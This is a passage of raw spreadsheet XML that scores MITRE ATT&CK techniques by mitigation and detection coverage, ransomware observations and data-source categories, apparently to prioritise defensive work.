      </c>
      <c r="AF106" s="25" t="str" cm="1">
        <f t="array" ref="AF106">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC106)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG106" s="25">
        <f>IF(AF106="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH106" s="25" t="str" cm="1">
        <f t="array" ref="AH106">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC106)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI106" s="25">
        <f>IF(AH106="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ106" s="25" t="str" cm="1">
        <f t="array" ref="AJ106">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC106)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK106" s="25">
        <f>IF(AJ106="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL106" s="25" t="str" cm="1">
        <f t="array" ref="AL106">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC106)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM106" s="25">
        <f>IF(AL106="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN106" s="58">
        <v>1</v>
      </c>
      <c r="AO106" s="51">
        <v>1</v>
      </c>
      <c r="AP106" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.1728133490000001E-2</v>
      </c>
      <c r="AQ106" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.1316000522222226E-2</v>
      </c>
      <c r="AR106" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>6.1316000522222226E-2</v>
      </c>
      <c r="AS106" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT106" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU10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07" spans="1:47">
      <c r="A107" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.4298406285714289E-2</v>
      </c>
      <c r="B107" s="25">
        <f>SUM(H107,M107,V107)*(1+SUM(AE107,AG107,AI107,AK107,AM107))</f>
        <v>0.34298406285714289</v>
      </c>
      <c r="C107" s="25" t="s">
        <v>509</v>
      </c>
      <c r="D107" s="25" t="s">
        <v>510</v>
      </c>
      <c r="E107" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F107" s="51">
        <v>1</v>
      </c>
      <c r="G107" s="51">
        <v>1</v>
      </c>
      <c r="H107" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I107">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J107">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K107">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L107">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M107" s="44">
        <v>1.2692000000000001E-4</v>
      </c>
      <c r="N107" s="51">
        <v>0</v>
      </c>
      <c r="O107" s="51">
        <v>0</v>
      </c>
      <c r="P107" s="51">
        <v>0</v>
      </c>
      <c r="Q107" s="51">
        <v>1</v>
      </c>
      <c r="R107" s="52" t="s">
        <v>511</v>
      </c>
      <c r="S107" s="51">
        <v>9</v>
      </c>
      <c r="T107" s="52" t="s">
        <v>512</v>
      </c>
      <c r="U107" s="51">
        <v>16</v>
      </c>
      <c r="V107" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.24285714285714288</v>
      </c>
      <c r="W107">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>25</v>
      </c>
      <c r="X107">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="Y107">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="Z107">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA107">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB107">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC107" s="29" t="s">
        <v>513</v>
      </c>
      <c r="AD107" s="25" t="str" cm="1">
        <f t="array" ref="AD107">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC107)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE107" s="25">
        <f>IF(AD107="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF107" s="25" t="str" cm="1">
        <f t="array" ref="AF107">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC107)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG107" s="25">
        <f>IF(AF107="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH107" s="25" t="str" cm="1">
        <f t="array" ref="AH107">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC107)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI107" s="25">
        <f>IF(AH107="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ107" s="25" t="str" cm="1">
        <f t="array" ref="AJ107">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC107)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK107" s="25">
        <f>IF(AJ107="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL107" s="25" t="str" cm="1">
        <f t="array" ref="AL107">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC107)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM107" s="25">
        <f>IF(AL107="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN107" s="52">
        <v>0</v>
      </c>
      <c r="AO107" s="51">
        <v>0</v>
      </c>
      <c r="AP107" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.4298406285714289E-2</v>
      </c>
      <c r="AQ107" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.11432802095238097</v>
      </c>
      <c r="AR107" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.11432802095238097</v>
      </c>
      <c r="AS107" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT107" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU10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08" spans="1:47" ht="32.1">
      <c r="A108" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.16358354702666669</v>
      </c>
      <c r="B108" s="25">
        <f>SUM(H108,M108,V108)*(1+SUM(AE108,AG108,AI108,AK108,AM108))</f>
        <v>0.96916880360000024</v>
      </c>
      <c r="C108" s="25" t="s">
        <v>514</v>
      </c>
      <c r="D108" s="25" t="s">
        <v>515</v>
      </c>
      <c r="E108" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F108" s="51">
        <v>8</v>
      </c>
      <c r="G108" s="51">
        <v>2</v>
      </c>
      <c r="H108" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.5</v>
      </c>
      <c r="I108">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.8</v>
      </c>
      <c r="J108">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.8</v>
      </c>
      <c r="K108">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L108">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M108" s="44">
        <v>1.2692000000000001E-4</v>
      </c>
      <c r="N108" s="51">
        <v>3</v>
      </c>
      <c r="O108" s="51">
        <v>2</v>
      </c>
      <c r="P108" s="51">
        <v>1</v>
      </c>
      <c r="Q108" s="51">
        <v>0</v>
      </c>
      <c r="R108" s="52" t="s">
        <v>516</v>
      </c>
      <c r="S108" s="51">
        <v>10</v>
      </c>
      <c r="T108" s="52" t="s">
        <v>140</v>
      </c>
      <c r="U108" s="51">
        <v>11</v>
      </c>
      <c r="V108" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.22857142857142859</v>
      </c>
      <c r="W108">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>21</v>
      </c>
      <c r="X108">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Y108">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Z108">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>6</v>
      </c>
      <c r="AA108">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.06</v>
      </c>
      <c r="AB108">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.06</v>
      </c>
      <c r="AC108" s="29" t="s">
        <v>256</v>
      </c>
      <c r="AD108" s="25" t="str" cm="1">
        <f t="array" ref="AD108">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC108)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE108" s="25">
        <f>IF(AD108="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF108" s="25" t="str" cm="1">
        <f t="array" ref="AF108">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC108)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG108" s="25">
        <f>IF(AF108="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH108" s="25" t="str" cm="1">
        <f t="array" ref="AH108">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC108)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI108" s="25">
        <f>IF(AH108="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ108" s="25" t="str" cm="1">
        <f t="array" ref="AJ108">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC108)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK108" s="25">
        <f>IF(AJ108="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL108" s="25" t="str" cm="1">
        <f t="array" ref="AL108">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC108)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM108" s="25">
        <f>IF(AL108="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN108" s="52">
        <v>2</v>
      </c>
      <c r="AO108" s="51">
        <v>1</v>
      </c>
      <c r="AP108" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.16358354702666669</v>
      </c>
      <c r="AQ108" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.32305626786666675</v>
      </c>
      <c r="AR108" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.32305626786666675</v>
      </c>
      <c r="AS108" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT108" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU10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09" spans="1:47" ht="32.1">
      <c r="A109" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.3266880360000008E-2</v>
      </c>
      <c r="B109" s="25">
        <f>SUM(H109,M109,V109)*(1+SUM(AE109,AG109,AI109,AK109,AM109))</f>
        <v>0.33266880360000006</v>
      </c>
      <c r="C109" s="25" t="s">
        <v>517</v>
      </c>
      <c r="D109" s="25" t="s">
        <v>518</v>
      </c>
      <c r="E109" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F109" s="51">
        <v>1</v>
      </c>
      <c r="G109" s="51">
        <v>2</v>
      </c>
      <c r="H109" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.15000000000000002</v>
      </c>
      <c r="I109">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J109">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K109">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L109">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M109" s="44">
        <v>1.2692000000000001E-4</v>
      </c>
      <c r="N109" s="51">
        <v>0</v>
      </c>
      <c r="O109" s="51">
        <v>1</v>
      </c>
      <c r="P109" s="51">
        <v>0</v>
      </c>
      <c r="Q109" s="51">
        <v>0</v>
      </c>
      <c r="R109" s="52" t="s">
        <v>156</v>
      </c>
      <c r="S109" s="51">
        <v>2</v>
      </c>
      <c r="T109" s="51" t="s">
        <v>157</v>
      </c>
      <c r="U109" s="51">
        <v>8</v>
      </c>
      <c r="V109" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="W109">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>10</v>
      </c>
      <c r="X109">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.18181818181818182</v>
      </c>
      <c r="Y109">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.18181818181818182</v>
      </c>
      <c r="Z109">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA109">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB109">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC109" s="29" t="s">
        <v>519</v>
      </c>
      <c r="AD109" s="25" t="str" cm="1">
        <f t="array" ref="AD109">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC109)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE109" s="25">
        <f>IF(AD109="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF109" s="25" t="str" cm="1">
        <f t="array" ref="AF109">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC109)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG109" s="25">
        <f>IF(AF109="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH109" s="25" t="str" cm="1">
        <f t="array" ref="AH109">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC109)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI109" s="25">
        <f>IF(AH109="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ109" s="25" t="str" cm="1">
        <f t="array" ref="AJ109">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC109)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK109" s="25">
        <f>IF(AJ109="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL109" s="25" t="str" cm="1">
        <f t="array" ref="AL109">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC109)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM109" s="25">
        <f>IF(AL109="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN109" s="52">
        <v>0</v>
      </c>
      <c r="AO109" s="51">
        <v>0</v>
      </c>
      <c r="AP109" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.3266880360000008E-2</v>
      </c>
      <c r="AQ109" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.11088960120000002</v>
      </c>
      <c r="AR109" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.11088960120000002</v>
      </c>
      <c r="AS109" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT109" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU10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10" spans="1:47" ht="32.1">
      <c r="A110" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.16328840168751496</v>
      </c>
      <c r="B110" s="25">
        <f>SUM(H110,M110,V110)*(1+SUM(AE110,AG110,AI110,AK110,AM110))</f>
        <v>0.29955068354181646</v>
      </c>
      <c r="C110" s="25" t="s">
        <v>520</v>
      </c>
      <c r="D110" s="25" t="s">
        <v>521</v>
      </c>
      <c r="E110" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F110" s="51">
        <v>1</v>
      </c>
      <c r="G110" s="51">
        <v>0</v>
      </c>
      <c r="H110" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I110">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J110">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K110">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L110">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M110" s="45">
        <v>4.2306796174037598E-5</v>
      </c>
      <c r="N110" s="51">
        <v>0</v>
      </c>
      <c r="O110" s="51">
        <v>4</v>
      </c>
      <c r="P110" s="51">
        <v>5</v>
      </c>
      <c r="Q110" s="51">
        <v>3</v>
      </c>
      <c r="R110" s="52" t="s">
        <v>288</v>
      </c>
      <c r="S110" s="51">
        <v>5</v>
      </c>
      <c r="T110" s="52" t="s">
        <v>289</v>
      </c>
      <c r="U110" s="51">
        <v>10</v>
      </c>
      <c r="V110" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.19999999999999998</v>
      </c>
      <c r="W110">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>15</v>
      </c>
      <c r="X110">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.27272727272727271</v>
      </c>
      <c r="Y110">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.27272727272727271</v>
      </c>
      <c r="Z110">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>12</v>
      </c>
      <c r="AA110">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.12</v>
      </c>
      <c r="AB110">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.12</v>
      </c>
      <c r="AC110" s="29" t="s">
        <v>206</v>
      </c>
      <c r="AD110" s="25" t="str" cm="1">
        <f t="array" ref="AD110">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC110)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE110" s="25">
        <f>IF(AD110="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF110" s="25" t="str" cm="1">
        <f t="array" ref="AF110">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC110)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG110" s="25">
        <f>IF(AF110="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH110" s="25" t="str" cm="1">
        <f t="array" ref="AH110">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC110)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI110" s="25">
        <f>IF(AH110="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ110" s="25" t="str" cm="1">
        <f t="array" ref="AJ110">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC110)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK110" s="25">
        <f>IF(AJ110="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL110" s="25" t="str" cm="1">
        <f t="array" ref="AL110">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC110)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM110" s="25">
        <f>IF(AL110="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN110" s="60">
        <v>4</v>
      </c>
      <c r="AO110" s="51">
        <v>1</v>
      </c>
      <c r="AP110" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.16328840168751496</v>
      </c>
      <c r="AQ110" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>9.9850227847272155E-2</v>
      </c>
